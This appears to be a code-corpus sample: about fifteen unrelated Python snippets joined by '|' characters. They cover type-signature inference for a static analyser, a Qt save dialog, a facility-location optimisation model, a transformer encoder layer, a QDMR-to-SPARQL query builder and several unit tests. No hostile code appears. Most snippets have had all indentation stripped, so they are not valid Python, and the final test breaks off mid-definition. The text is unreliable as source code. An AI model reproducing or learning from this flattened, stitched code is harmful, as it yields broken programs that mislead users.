def _cached_get_argspec(self, obj: object, impl: Optional[Impl], is_asynq: bool, in_overload_resolution: bool) -> MaybeSignature:
try:
if (obj in self.known_argspecs):
return self.known_argspecs[obj]
except Exception:
hashable = False
else:
hashable = True
extended = self._uncached_get_argspec(obj, impl, is_asynq, in_overload_resolution)
if (extended is None):
return None
if hashable:
self.known_argspecs[obj] = extended
return extended
def _maybe_make_evaluator_sig(self, func: Callable[(..., Any)], impl: Optional[Impl], is_asynq: bool) -> MaybeSignature:
try:
key = f'{func.__module__}.{func.__qualname__}'
except AttributeError:
return None
evaluation_funcs = get_type_evaluations(key)
if (not evaluation_funcs):
return None
sigs = []
for evaluation_func in evaluation_funcs:
if ((evaluation_func is None) or (not hasattr(evaluation_func, '__globals__'))):
return None
sig = self._cached_get_argspec(evaluation_func, impl, is_asynq, in_overload_resolution=True)
if (not isinstance(sig, Signature)):
return None
(lines, _) = inspect.getsourcelines(evaluation_func)
code = textwrap.dedent(''.join(lines))
body = ast.parse(code)
if (not body.body):
return None
evaluator_node = body.body[0]
if (not isinstance(evaluator_node, ast.FunctionDef)):
return None
evaluator = RuntimeEvaluator(evaluator_node, sig.return_value, evaluation_func.__globals__, evaluation_func)
sigs.append(replace(sig, evaluator=evaluator))
if (len(sigs) == 1):
return sigs[0]
return OverloadedSignature(sigs)
def _uncached_get_argspec(self, obj: Any, impl: Optional[Impl], is_asynq: bool, in_overload_resolution: bool) -> MaybeSignature:
if isinstance(obj, tuple):
return None
if is_dot_asynq_function(obj):
try:
return self._cached_get_argspec(obj.__self__, impl, is_asynq, in_overload_resolution)
except TypeError:
pass
if safe_isinstance(obj, MethodWrapperType):
try:
unbound = getattr(obj.__objclass__, obj.__name__)
except Exception:
pass
else:
sig = self._cached_get_argspec(unbound, impl, is_asynq, in_overload_resolution)
if (sig is not None):
return make_bound_method(sig, Composite(KnownValue(obj.__self__)))
if (inspect.ismethod(obj) and (obj.__self__ is not None)):
argspec = self._cached_get_argspec(obj.__func__, impl, is_asynq, in_overload_resolution)
return make_bound_method(argspec, Composite(KnownValue(obj.__self__)))
if (not in_overload_resolution):
for get_overloads_func in _GET_OVERLOADS:
inner_obj = safe_getattr(obj, '__func__', obj)
if (safe_hasattr(inner_obj, '__module__') and safe_hasattr(inner_obj, '__qualname__')):
sig = self._maybe_make_overloaded_signature(get_overloads_func(inner_obj), impl, is_asynq)
if (sig is not None):
return sig
fq_name = get_fully_qualified_name(obj)
if (fq_name is not None):
sig = self._maybe_make_overloaded_signature(pyanalyze_get_overloads(fq_name), impl, is_asynq)
if (sig is not None):
return sig
evaluator_sig = self._maybe_make_evaluator_sig(obj, impl, is_asynq)
if (evaluator_sig is not None):
return evaluator_sig
if (hasattr_static(obj, 'fn') or hasattr_static(obj, 'original_fn')):
is_asynq = (is_asynq or hasattr_static(obj, 'asynq'))
try:
original_fn = qcore.get_original_fn(obj)
except (TypeError, AttributeError):
pass
else:
return self._cached_get_argspec(original_fn, impl, is_asynq, in_overload_resolution)
if (safe_isinstance(obj, type) and safe_issubclass(obj, enum.Enum) and safe_isinstance(obj.__call__, MethodType) and safe_equals(obj.__call__.__func__, _ENUM_CALL)):
signature = self._cached_get_argspec(_ENUM_CALL, impl, is_asynq, in_overload_resolution)
self_value = SubclassValue(TypedValue(obj))
bound_sig = make_bound_method(signature, Composite(self_value))
if (bound_sig is None):
return None
sig = bound_sig.get_signature(preserve_impl=True, ctx=self.ctx, self_annotation_value=self_value)
if (sig is not None):
return sig
return bound_sig
allow_call = (FunctionsSafeToCall.contains(obj, self.options) or (safe_isinstance(obj, type) and safe_issubclass(obj, self.safe_bases)))
if safe_isinstance(obj, (type, str)):
type_params = self.get_type_parameters(obj)
else:
type_params = []
argspec = self.ts_finder.get_argspec(obj, allow_call=allow_call, type_params=type_params)
if (argspec is not None):
return argspec
if (is_typeddict(obj) and (not is_typing_name(obj, 'TypedDict'))):
td_type = type_from_runtime(obj)
if isinstance(td_type, TypedDictValue):
params = [SigParameter(key, ParameterKind.KEYWORD_ONLY, default=(None if required else KnownValue(...)), annotation=value) for (key, (required, value)) in td_type.items.items()]
if (td_type.extra_keys is not None):
annotation = GenericValue(dict, [TypedValue(str), td_type.extra_keys])
params.append(SigParameter('%kwargs', ParameterKind.VAR_KEYWORD, annotation=annotation))
return Signature.make(params, td_type, callable=obj)
if is_newtype(obj):
assert hasattr(obj, '__supertype__')
return Signature.make([SigParameter('x', ParameterKind.POSITIONAL_ONLY, annotation=type_from_runtime(obj.__supertype__, ctx=self.default_context))], NewTypeValue(obj), callable=obj)
if inspect.isfunction(obj):
if hasattr_static(obj, 'inner'):
return self._cached_get_argspec(obj.inner, impl, is_asynq, in_overload_resolution)
inspect_sig = self._safe_get_signature(obj)
if (inspect_sig is None):
return self._make_any_sig(obj)
return self.from_signature(inspect_sig, function_object=obj, callable_object=obj, is_async=asyncio.iscoroutinefunction(obj), impl=impl, is_asynq=is_asynq)
if _is_qcore_decorator(obj):
argspec = self._cached_get_argspec(obj.decorator, impl, is_asynq, in_overload_resolution)
if ((obj.instance is not None) and (argspec is not None)):
return make_bound_method(argspec, Composite(KnownValue(obj.instance)))
return argspec
if inspect.isclass(obj):
obj = UnwrapClass.unwrap(obj, self.options)
override = ConstructorHooks.get_constructor(obj, self.options)
is_dunder_new = False
if isinstance(override, Signature):
signature = override
else:
should_ignore = IgnoredCallees.contains(obj, self.options)
if should_ignore:
return_type = AnyValue(AnySource.error)
elif type_params:
return_type = GenericValue(obj, type_params)
else:
return_type = TypedValue(obj)
if isinstance(override, inspect.Signature):
inspect_sig = override
constructor = None
elif ((override is None) and hasattr_static(obj, '__signature__') and safe_isinstance(obj.__signature__, inspect.Signature)):
inspect_sig = obj.__signature__.replace(parameters=[_SELF_PARAM, *obj.__signature__.parameters.values()])
constructor = obj
else:
if (override is not None):
constructor = override
elif isinstance(obj.__new__, FunctionType):
is_dunder_new = True
constructor = obj.__new__
else:
constructor = obj.__init__
inspect_sig = self._safe_get_signature(constructor)
if (inspect_sig is None):
return Signature.make([ELLIPSIS_PARAM], return_type, callable=obj, allow_call=allow_call)
signature = self.from_signature(inspect_sig, function_object=constructor, callable_object=obj, impl=impl, returns=return_type, allow_call=allow_call)
bound_sig = make_bound_method(signature, Composite(TypedValue(obj)))
if (bound_sig is None):
return None
if is_dunder_new:
self_annotation_value = KnownValue(obj)
elif type_params:
self_annotation_value = GenericValue(obj, type_params)
else:
self_annotation_value = TypedValue(obj)
sig = bound_sig.get_signature(preserve_impl=True, ctx=self.ctx, self_annotation_value=self_annotation_value)
if (sig is not None):
return sig
return bound_sig
if inspect.isbuiltin(obj):
if isinstance(obj.__self__, ModuleType):
inspect_sig = self._safe_get_signature(obj)
if (inspect_sig is not None):
return self.from_signature(inspect_sig, function_object=obj, callable_object=obj)
return self._make_any_sig(obj)
else:
cls = type(obj.__self__)
try:
method = getattr(cls, obj.__name__)
except AttributeError:
return self._make_any_sig(obj)
if (method == obj):
return self._make_any_sig(obj)
argspec = self._cached_get_argspec(method, impl, is_asynq, in_overload_resolution)
return make_bound_method(argspec, Composite(KnownValue(obj.__self__)))
if hasattr_static(obj, '__call__'):
return self._make_any_sig(obj)
return None
def _maybe_make_overloaded_signature(self, overloads: Sequence[Callable[(..., Any)]], impl: Optional[Impl], is_asynq: bool) -> Optional[OverloadedSignature]:
if (not overloads):
return None
sigs = [self._cached_get_argspec(overload, impl, is_asynq, in_overload_resolution=True) for overload in overloads]
if (not all_of_type(sigs, Signature)):
return None
return OverloadedSignature(sigs)
def _make_any_sig(self, obj: object) -> Signature:
if FunctionsSafeToCall.contains(obj, self.options):
return Signature.make([ELLIPSIS_PARAM], AnyValue(AnySource.inference), is_asynq=True, allow_call=True, callable=obj)
else:
return ANY_SIGNATURE
def _safe_get_signature(self, obj: Any) -> Optional[inspect.Signature]:
try:
return inspect.signature(obj, follow_wrapped=False)
except (TypeError, ValueError, AttributeError):
return None
def get_type_parameters(self, typ: Union[(type, str)]) -> List[Value]:
bases = self.get_generic_bases(typ, substitute_typevars=False)
tv_map = bases.get(typ, {})
return [tv for tv in tv_map.values()]
def get_generic_bases(self, typ: Union[(type, str)], generic_args: Sequence[Value]=(), *, substitute_typevars: bool=True) -> GenericBases:
if ((typ is Generic) or is_typing_name(typ, 'Protocol') or (typ is object) or (typ in ('typing.Generic', 'typing_extensions.Generic', 'builtins.object'))):
return {}
generic_bases = self._get_generic_bases_cached(typ)
if (typ not in generic_bases):
return generic_bases
my_typevars = generic_bases[typ]
if (not my_typevars):
return generic_bases
tv_map = {}
if substitute_typevars:
for (i, tv_value) in enumerate(my_typevars.values()):
if (not isinstance(tv_value, TypeVarValue)):
continue
try:
value = generic_args[i]
except IndexError:
value = AnyValue(AnySource.generic_argument)
tv_map[tv_value.typevar] = value
return {base: {tv: value.substitute_typevars(tv_map) for (tv, value) in args.items()} for (base, args) in generic_bases.items()}
def _get_generic_bases_cached(self, typ: Union[(type, str)]) -> GenericBases:
try:
return self.generic_bases_cache[typ]
except KeyError:
pass
except Exception:
return {}
if isinstance(typ, str):
bases = self.ts_finder.get_bases_for_fq_name(typ)
else:
bases = self.ts_finder.get_bases(typ)
generic_bases = self._extract_bases(typ, bases)
if (generic_bases is None):
assert isinstance(typ, type), f'failed to extract typeshed bases for {typ!r}'
bases = [type_from_runtime(base, ctx=self.default_context) for base in self.get_runtime_bases(typ)]
generic_bases = self._extract_bases(typ, bases)
assert (generic_bases is not None), f'failed to extract runtime bases from {typ}'
self.generic_bases_cache[typ] = generic_bases
return generic_bases
def _extract_bases(self, typ: Union[(type, str)], bases: Optional[Sequence[Value]]) -> Optional[GenericBases]:
if (bases is None):
return None
bases = sorted(bases, key=(lambda base: ((not isinstance(base, TypedValue)) or (base.typ is not Generic))))
my_typevars = uniq_chain((extract_typevars(base) for base in bases))
generic_bases = {}
generic_bases[typ] = {tv: TypeVarValue(tv) for tv in my_typevars}
for base in bases:
if isinstance(base, TypedValue):
if isinstance(base.typ, str):
assert (base.typ != typ), base
else:
assert (base.typ is not typ), base
if isinstance(base, GenericValue):
args = base.args
else:
args = ()
generic_bases.update(self.get_generic_bases(base.typ, args))
else:
return None
return generic_bases
def get_runtime_bases(self, typ: type) -> Sequence[object]:
if is_typeddict(typ):
return (dict,)
try:
return typ.__orig_bases__
except AttributeError:
return typ.__bases__ |
def getSaveFileName(*, parent, title, filename, filter='', default_extension: Optional[str]=None, default_filter: Optional[str]=None, config: 'SimpleConfig') -> Optional[str]:
directory = config.get('io_dir', os.path.expanduser('~'))
path = os.path.join(directory, filename)
file_dialog = QFileDialog(parent, title, path, filter)
file_dialog.setAcceptMode(QFileDialog.AcceptSave)
if default_extension:
file_dialog.setDefaultSuffix(default_extension)
if default_filter:
assert (default_filter in filter), f'default_filter={default_filter!r} does not appear in filter={filter!r}'
file_dialog.selectNameFilter(default_filter)
if (file_dialog.exec() != QDialog.Accepted):
return None
selected_path = file_dialog.selectedFiles()[0]
if (selected_path and (directory != os.path.dirname(selected_path))):
config.set_key('io_dir', os.path.dirname(selected_path), True)
return selected_path |
class TestText(unittest.TestCase):
def setUp(self):
self.text_mock = mock.Mock()
def test_setting_text(self):
Text._set_text(self.text_mock, 'foo')
self.assertEqual(self.text_mock.text, 'foo')
def test_setting_color_with_color_provided(self):
Text._set_color(self.text_mock, '#000')
self.assertEqual(self.text_mock.color, (0, 0, 0))
def test_setting_color_without_color(self):
Text._set_color(self.text_mock, None)
self.assertIsNone(self.text_mock.color)
def test_initialization(self):
outline = Outline(2, '#111')
text = Text('foo', Font(), '#000', outline)
self.assertEqual(text.text, 'foo')
self.assertIsNotNone(text.font)
self.assertEqual(text.color, (0, 0, 0))
self.assertEqual(text.outline, outline) |
class _ImageCollection(pystiche.ComplexObject):
def __init__(self, images: Mapping[(str, _Image)]) -> None:
self._images = images
def __len__(self) -> int:
return len(self._images)
def __getitem__(self, name: str) -> _Image:
return self._images[name]
def __iter__(self) -> Iterator[Tuple[(str, _Image)]]:
for (name, image) in self._images.items():
(yield (name, image))
def __contains__(self, name: str) -> bool:
return (name in self._images)
def read(self, root: Optional[str]=None, **read_image_kwargs: Any) -> Dict[(str, torch.Tensor)]:
return {name: image.read(root=root, **read_image_kwargs) for (name, image) in self}
def _named_children(self) -> Iterator[Tuple[(str, Any)]]:
(yield from iter(self._images.items())) |
def test_gmail_checker_invalid_response(fake_qtile, monkeypatch, fake_window):
monkeypatch.setitem(sys.modules, 'imaplib', FakeIMAP('imaplib'))
reload(gmail_checker)
gmc = gmail_checker.GmailChecker()
fakebar = FakeBar([gmc], window=fake_window)
gmc._configure(fake_qtile, fakebar)
text = gmc.poll()
assert (text == 'UNKNOWN ERROR') |
def setup_custom_environment(custom_module_path):
module = import_file('maskrcnn_benchmark.utils.env.custom_module', custom_module_path)
assert (hasattr(module, 'setup_environment') and callable(module.setup_environment)), "Custom environment module defined in {} does not have the required callable attribute 'setup_environment'.".format(custom_module_path)
module.setup_environment() |
class MCLP(LocateSolver, BaseOutputMixin, CoveragePercentageMixin):
def __init__(self, name: str, problem: pulp.LpProblem):
super().__init__(name, problem)
def __add_obj(self, weights: np.array, range_clients: range) -> None:
dem_vars = getattr(self, 'cli_vars')
self.problem += (pulp.lpSum([(weights.flatten()[i] * dem_vars[i]) for i in range_clients]), 'objective function')
@classmethod
def from_cost_matrix(cls, cost_matrix: np.array, weights: np.array, service_radius: float, p_facilities: int, predefined_facilities_arr: np.array=None, name: str='mclp'):
n_cli = cost_matrix.shape[0]
r_cli = range(n_cli)
r_fac = range(cost_matrix.shape[1])
model = pulp.LpProblem(name, pulp.LpMaximize)
mclp = MCLP(name, model)
FacilityModelBuilder.add_facility_integer_variable(mclp, r_fac, 'x[{i}]')
FacilityModelBuilder.add_client_integer_variable(mclp, r_cli, 'y[{i}]')
mclp.aij = np.zeros(cost_matrix.shape)
mclp.aij[(cost_matrix <= service_radius)] = 1
weights = np.reshape(weights, (n_cli, 1))
mclp.__add_obj(weights, r_cli)
if (predefined_facilities_arr is not None):
FacilityModelBuilder.add_predefined_facility_constraint(mclp, predefined_facilities_arr)
FacilityModelBuilder.add_maximal_coverage_constraint(mclp, r_fac, r_cli)
FacilityModelBuilder.add_facility_constraint(mclp, p_facilities)
return mclp
@classmethod
def from_geodataframe(cls, gdf_demand: GeoDataFrame, gdf_fac: GeoDataFrame, demand_col: str, facility_col: str, weights_cols: str, service_radius: float, p_facilities: int, predefined_facility_col: str=None, distance_metric: str='euclidean', name: str='mclp'):
predefined_facilities_arr = None
if (predefined_facility_col is not None):
predefined_facilities_arr = gdf_fac[predefined_facility_col].to_numpy()
service_load = gdf_demand[weights_cols].to_numpy()
dem = gdf_demand[demand_col]
fac = gdf_fac[facility_col]
dem_type_geom = dem.geom_type.unique()
fac_type_geom = fac.geom_type.unique()
_msg = " geodataframe contains mixed type geometries or is not a point. Be sure deriving centroid from geometries doesn't affect the results."
if ((len(dem_type_geom) > 1) or ('Point' not in dem_type_geom)):
warnings.warn(f'Demand{_msg}', UserWarning, stacklevel=2)
dem = dem.centroid
if ((len(fac_type_geom) > 1) or ('Point' not in fac_type_geom)):
warnings.warn(f'Facility{_msg}', UserWarning, stacklevel=2)
fac = fac.centroid
dem_data = np.array([dem.x.to_numpy(), dem.y.to_numpy()]).T
fac_data = np.array([fac.x.to_numpy(), fac.y.to_numpy()]).T
if (gdf_demand.crs != gdf_fac.crs):
raise ValueError(f'Geodataframes crs are different: gdf_demand-{gdf_demand.crs}, gdf_fac-{gdf_fac.crs}')
distances = cdist(dem_data, fac_data, distance_metric)
return cls.from_cost_matrix(distances, service_load, service_radius, p_facilities, predefined_facilities_arr, name)
def facility_client_array(self) -> None:
fac_vars = getattr(self, 'fac_vars')
cli_vars = getattr(self, 'cli_vars')
len_fac_vars = len(fac_vars)
self.fac2cli = []
for j in range(len_fac_vars):
array_cli = []
if (fac_vars[j].value() > 0):
for i in range(self.aij.shape[0]):
if ((cli_vars[i].value() > 0) and (self.aij[(i, j)] > 0)):
array_cli.append(i)
self.fac2cli.append(array_cli)
def solve(self, solver: pulp.LpSolver, results: bool=True):
self.problem.solve(solver)
self.check_status()
if results:
self.facility_client_array()
self.client_facility_array()
self.uncovered_clients()
self.get_percentage()
return self |
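# A small synthetic run of the solver above: three demand points, two
# candidate facilities, one facility to site. Assumes pulp's bundled CBC
# solver is available.
import numpy as np
import pulp

cost = np.array([[1.0, 4.0], [2.0, 1.0], [5.0, 2.0]])
weights = np.array([10, 20, 30])
mclp = MCLP.from_cost_matrix(cost, weights, service_radius=2.5, p_facilities=1)
mclp = mclp.solve(pulp.PULP_CBC_CMD(msg=False))
print(mclp.fac2cli)  # clients covered by each sited facility |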
class TransformerEncoderLayer(nn.Module):
def __init__(self, d_model, nhead, dim_feedforward=2048, dropout=0.1, activation='relu', normalize_before=False, norm=True, no_ffn=False, no_encoder_self_att=False):
super().__init__()
self.no_ffn = no_ffn
self.no_encoder_self_att = no_encoder_self_att
if (not self.no_encoder_self_att):
self.self_attn = nn.MultiheadAttention(d_model, nhead, dropout=dropout)
if (not self.no_ffn):
self.linear1 = nn.Linear(d_model, dim_feedforward)
self.dropout = nn.Dropout(dropout)
self.linear2 = nn.Linear(dim_feedforward, d_model)
self.norm1 = (nn.LayerNorm(d_model) if norm else nn.Identity())
self.norm2 = (nn.LayerNorm(d_model) if norm else nn.Identity())
self.dropout1 = nn.Dropout(dropout)
self.dropout2 = nn.Dropout(dropout)
self.activation = _get_activation_fn(activation)
self.normalize_before = normalize_before
def with_pos_embed(self, tensor, pos: Optional[Tensor]):
return (tensor if (pos is None) else (tensor + pos))
def forward_post(self, src, src_mask: Optional[Tensor]=None, src_key_padding_mask: Optional[Tensor]=None, pos: Optional[Tensor]=None):
q = k = self.with_pos_embed(src, pos)
if (not self.no_encoder_self_att):
src2 = self.self_attn(q, k, value=src, attn_mask=src_mask, key_padding_mask=src_key_padding_mask)[0]
if self.no_ffn:
return (src + src2)
src = (src + self.dropout1(src2))
src = self.norm1(src)
src2 = self.linear2(self.dropout(self.activation(self.linear1(src))))
src = (src + self.dropout2(src2))
src = self.norm2(src)
return src
def forward_pre(self, src, src_mask: Optional[Tensor]=None, src_key_padding_mask: Optional[Tensor]=None, pos: Optional[Tensor]=None):
src2 = self.norm1(src)
q = k = self.with_pos_embed(src2, pos)
src2 = self.self_attn(q, k, value=src2, attn_mask=src_mask, key_padding_mask=src_key_padding_mask)[0]
if self.no_ffn:
return (src + src2)
src = (src + self.dropout1(src2))
src2 = self.norm2(src)
src2 = self.linear2(self.dropout(self.activation(self.linear1(src2))))
src = (src + self.dropout2(src2))
return src
def forward(self, src, src_mask: Optional[Tensor]=None, src_key_padding_mask: Optional[Tensor]=None, pos: Optional[Tensor]=None):
if self.normalize_before:
return self.forward_pre(src, src_mask, src_key_padding_mask, pos)
return self.forward_post(src, src_mask, src_key_padding_mask, pos) |
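# A shape-check sketch for the encoder layer above; inputs follow the
# (sequence, batch, d_model) layout expected by nn.MultiheadAttention.
# Assumes the module-level helper _get_activation_fn is in scope.
import torch

layer = TransformerEncoderLayer(d_model=256, nhead=8)
src = torch.randn(50, 4, 256)
out = layer(src)
assert out.shape == src.shape |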
class QueryCreator():
def __init__(self, strict_mode=False):
self.namer = VariableNamer()
self.creator_for_op_name = {}
self.creator_for_op_name['aggregate'] = QueryStepAggregate
self.creator_for_op_name['select'] = QueryStepSelect
self.creator_for_op_name['project'] = QueryStepProject
self.creator_for_op_name['union'] = QueryStepUnion
self.creator_for_op_name['intersection'] = QueryStepIntersection
self.creator_for_op_name['sort'] = QueryStepSort
self.creator_for_op_name['comparative'] = QueryStepComparative
self.creator_for_op_name['superlative'] = QueryStepSuperlative
self.creator_for_op_name['group'] = QueryStepGroup
self.creator_for_op_name['discard'] = QueryStepDiscard
self.creator_for_op_name['arithmetic'] = QueryStepArithmetic
self.strict_mode = strict_mode
def build_sparql_query(self, qdmr, schema, rdf_graph, grounding):
qdmr = copy.deepcopy(qdmr)
grounding = copy.deepcopy(grounding)
schema = copy.deepcopy(schema)
self.cleanup_qdmr(qdmr, grounding)
self.parse_distinct_grounding(grounding, len(qdmr))
for (op, args) in qdmr:
assert (op in self.creator_for_op_name), f'Could not find a method for the QDMR op {op}'
self.grounding_for_qdmr_index = self.build_grounding_qdmr_steps_before_execution(qdmr, grounding)
self.qdmr = qdmr
self.schema = SchemaWithRdfGraph(schema, rdf_graph)
self.grounding = grounding
qdmr_index = (len(qdmr) - 1)
context = self.construct_set_of_args([qdmr_index], inline_query=False)
query = QueryToRdf(query=context.query, output_cols=[u.output_col for u in context.output_units_for_qdmr_index[qdmr_index]], sorting_info=context.sorting_info)
for (i_op, (op, args)) in enumerate(qdmr):
if (op == 'superlative'):
query.query_has_superlative = True
if (op == 'comparative'):
grnd_ind = GroundingIndex(i_op, 2, args[2])
if (grounding.get(grnd_ind) and grounding[grnd_ind].iscomp()):
grnd = grounding[grnd_ind]
if ((grnd.keys[0] == '=') and (len(grnd.keys) > 1) and QdmrInstance.is_good_qdmr_ref(grnd.keys[1])):
ref_ind = QdmrInstance.ref_to_index(grnd.keys[1])
(ref_op, ref_args) = qdmr[ref_ind]
if ((ref_op == 'aggregate') and (ref_args[0].lower() in ['min', 'max'])):
query.query_has_superlative = True
return query
def construct_set_of_args(self, qdmr_target_indices, inline_query, context=None):
if (context is None):
context = LocalContext()
op_list = [self.qdmr.ops[i] for i in qdmr_target_indices]
if ('group' in op_list):
non_group_pos = 0
qdmr_target_indices = copy.deepcopy(qdmr_target_indices)
while ('group' in op_list[non_group_pos:]):
i_group = op_list.index('group', non_group_pos)
op_list = (((op_list[:non_group_pos] + [op_list[i_group]]) + op_list[non_group_pos:i_group]) + op_list[(i_group + 1):])
qdmr_target_indices = (((qdmr_target_indices[:non_group_pos] + [qdmr_target_indices[i_group]]) + qdmr_target_indices[non_group_pos:i_group]) + qdmr_target_indices[(i_group + 1):])
non_group_pos += 1
num_loops = 0
max_num_loops = 10
while ((not all(((index in context.output_units_for_qdmr_index) for index in qdmr_target_indices))) and (num_loops < max_num_loops)):
for index in qdmr_target_indices:
if (index not in context.output_units_for_qdmr_index):
op = self.creator_for_op_name[self.qdmr.ops[index]](self)
context = op.build_step(index, inline_query=inline_query, context=context)
num_loops += 1
assert (num_loops < max_num_loops), f'Could not compute target indices {qdmr_target_indices}, got this: {context.output_units_for_qdmr_index}'
return context
@classmethod
def build_grounding_qdmr_steps_before_execution(cls, qdmr, grounding):
grounding_for_qdmr_index = {}
for (qdmr_index, (op, args)) in enumerate(qdmr):
op = op.lower()
if (op in ['select']):
i_arg = 0
grnd = [grounding[GroundingIndex(qdmr_index, i_arg, args[i_arg])]]
elif (op in ['project']):
i_arg = 0
index = GroundingIndex(qdmr_index, i_arg, args[i_arg])
if (index in grounding):
grnd = [grounding[index]]
else:
i_arg = 1
source_index = QdmrInstance.ref_to_index(args[i_arg], qdmr_index)
grnd = grounding_for_qdmr_index[source_index]
elif (op in ['comparative', 'superlative', 'intersection', 'discard', 'sort']):
i_arg = (0 if (op not in ['superlative']) else 1)
source_index = QdmrInstance.ref_to_index(args[i_arg], qdmr_index)
grnd = grounding_for_qdmr_index[source_index]
elif (op in ['aggregate', 'group']):
i_arg = 1
source_index = QdmrInstance.ref_to_index(args[i_arg], qdmr_index)
grnd = [None for s in grounding_for_qdmr_index[source_index]]
elif (op in ['union']):
source_indices = [QdmrInstance.ref_to_index(arg, qdmr_index) for arg in args]
source_grnds = [tuple(grounding_for_qdmr_index[i_]) for i_ in source_indices]
aggregate_in_args = [(qdmr.ops[i] == 'aggregate') for i in source_indices]
if all(aggregate_in_args):
grnd = sum([grounding_for_qdmr_index[i_] for i_ in source_indices], [])
elif any(((qdmr.ops[i] == 'group') for i in source_indices)):
grnd = sum([grounding_for_qdmr_index[i_] for i_ in source_indices], [])
else:
is_vertical_union = all(((source_grnds[0] == g) for g in source_grnds[1:]))
if is_vertical_union:
grnd = grounding_for_qdmr_index[source_indices[0]]
else:
grnd = sum([grounding_for_qdmr_index[i_] for i_ in source_indices], [])
elif (op in ['arithmetic']):
grnd = [None]
else:
raise RuntimeError(f'Have not implemented static grounding for op {op} in {qdmr}, {grounding}')
grounding_for_qdmr_index[qdmr_index] = grnd
return grounding_for_qdmr_index
@classmethod
def parse_distinct_grounding(cls, out_grounding, num_ops=None):
if ('distinct' in out_grounding):
out_grounding['distinct'] = [QdmrInstance.ref_to_index(ref, max_index=num_ops) for ref in out_grounding['distinct']]
else:
out_grounding['distinct'] = []
@classmethod
def cleanup_qdmr(cls, out_qdmr, out_grounding):
for i_op in range(len(out_qdmr)):
cls.qdmr_cleanup_change_comparative_to_superlative(i_op, out_qdmr, out_grounding)
cls.qdmr_cleanup_grounded_aggregator(i_op, out_qdmr, out_grounding)
cls.qdmr_cleanup_change_filter_to_comparative(i_op, out_qdmr, out_grounding)
@classmethod
def qdmr_cleanup_change_comparative_to_superlative(cls, i_op, out_qdmr, out_grounding):
(op, args) = out_qdmr[i_op]
if (op.lower() == 'comparative'):
grnd_key_src = GroundingIndex(i_op, 2, args[2])
grnd = out_grounding.get(grnd_key_src)
if (grnd and grnd.iscomp() and (grnd.keys[0].lower() in ['min', 'max'])):
out_qdmr.ops[i_op] = 'superlative'
assert (len(args) == 3), f'COMPARATIVE should have 3 args but have {len(args)}: {args}'
out_qdmr.args[i_op] = [args[2], args[0], args[1]]
grnd_key_target = GroundingIndex(i_op, 0, out_qdmr.args[i_op][0])
out_grounding[grnd_key_target] = out_grounding.pop(grnd_key_src)
elif (op.lower() == 'filter'):
grnd_key_src = GroundingIndex(i_op, 1, args[1])
grnd = out_grounding.get(grnd_key_src)
if (grnd and grnd.iscomp() and (grnd.keys[0].lower() in ['min', 'max'])):
out_qdmr.ops[i_op] = 'superlative'
assert (len(args) == 2), f'FILTER should have 2 args but have {len(args)}: {args}'
out_qdmr.args[i_op] = [args[1], args[0], args[0]]
grnd_key_target = GroundingIndex(i_op, 0, out_qdmr.args[i_op][0])
out_grounding[grnd_key_target] = out_grounding.pop(grnd_key_src)
@classmethod
def qdmr_cleanup_grounded_aggregator(cls, i_op, out_qdmr, out_grounding):
(op, args) = out_qdmr[i_op]
if (op.lower() in ['group', 'aggregate']):
grnd_index = GroundingIndex(i_op, 0, args[0])
if ((grnd_index in out_grounding) and out_grounding[grnd_index]):
out_qdmr.ops[i_op] = 'project'
if (op.lower() == 'group'):
assert (len(args) == 3), f'GROUP should have 3 args but have {len(args)}: {args}'
i_arg_target = 2
elif (op.lower() == 'aggregate'):
assert (len(args) == 2), f'AGGREGATE should have 2 args but have {len(args)}: {args}'
i_arg_target = 1
else:
raise RuntimeError(f"Unknown op '{op}'")
out_qdmr.args[i_op] = [str(grnd_index), args[i_arg_target]]
out_grounding[GroundingIndex(i_op, 0, out_qdmr.args[i_op][0])] = out_grounding[grnd_index]
del out_grounding[grnd_index]
@classmethod
def qdmr_cleanup_change_filter_to_comparative(cls, i_op, out_qdmr, out_grounding):
(op, args) = out_qdmr[i_op]
if (op.lower() == 'filter'):
grnd_key_src = GroundingIndex(i_op, 1, args[1])
out_qdmr.ops[i_op] = 'comparative'
assert (len(args) == 2), f'FILTER should have 2 args but have {len(args)}: {args}'
out_qdmr.args[i_op] = [args[0], args[0], args[1]]
grnd_key_target = GroundingIndex(i_op, 2, out_qdmr.args[i_op][2])
if (grnd_key_src in out_grounding):
out_grounding[grnd_key_target] = out_grounding.pop(grnd_key_src) |
@pytest.mark.parametrize('func', [(lambda x: x.sum()), (lambda x: x.count()), (lambda x: x.apply((lambda x: x))), (lambda x: x.full()), (lambda x: x.var()), (lambda x: x.std())], ids=['sum', 'count', 'apply', 'full', 'var', 'std'])
def test_ewm_notimplemented(func):
sdf = DataFrame(example=pd.DataFrame(columns=['x', 'y']))
with pytest.raises(NotImplementedError):
func(sdf.ewm(1)) |
@hookimpl
def pylsp_lint(workspace: Workspace, document: Document) -> List[Dict]:
settings = load_settings(workspace, document.path)
checks = run_ruff_check(document=document, settings=settings)
diagnostics = [create_diagnostic(check=c, settings=settings) for c in checks]
return converter.unstructure(diagnostics) |
def decode_header(trf_header_contents: bytes) -> Header:
match = _header_match(trf_header_contents)
groups = match.groups()
date = groups[0].decode('utf-8')
timezone = groups[1].decode('utf-8')
field = groups[2].decode('utf-8')
machine = groups[3].decode('utf-8')
mu = np.frombuffer(groups[4][0:8], dtype=np.float64).item()
version = np.frombuffer(groups[4][8:12], dtype=np.int32).item()
item_parts_number = np.frombuffer(groups[4][12:16], dtype=np.int32).item()
item_parts = np.frombuffer(groups[4][16:(16 + (4 * item_parts_number))], dtype=np.int16)
item_parts_length = int(len(item_parts))
split_field = field.split('/')
if (len(split_field) == 2):
(field_label, field_name) = split_field
else:
(field_label, field_name) = ('', field)
header = Header(machine, date, timezone, field_label, field_name, mu, version, item_parts_number, item_parts_length, item_parts)
return header |
class CalcChangeFitSystemSecurityCommand(wx.Command):
def __init__(self, fitID, secStatus):
wx.Command.__init__(self, True, 'Change Fit System Security')
self.fitID = fitID
self.secStatus = secStatus
self.savedSecStatus = None
def Do(self):
pyfalog.debug('Doing changing system security status of fit {} to {}'.format(self.fitID, self.secStatus))
fit = Fit.getInstance().getFit(self.fitID, basic=True)
if (fit.getSystemSecurity() == self.secStatus):
return False
self.savedSecStatus = fit.systemSecurity
fit.systemSecurity = self.secStatus
return True
def Undo(self):
pyfalog.debug('Undoing changing system security status of fit {} to {}'.format(self.fitID, self.secStatus))
cmd = CalcChangeFitSystemSecurityCommand(fitID=self.fitID, secStatus=self.savedSecStatus)
return cmd.Do() |
class TestSharedoc(ZiplineTestCase):
def test_copydoc(self):
def original_docstring_function():
pass
@copydoc(original_docstring_function)
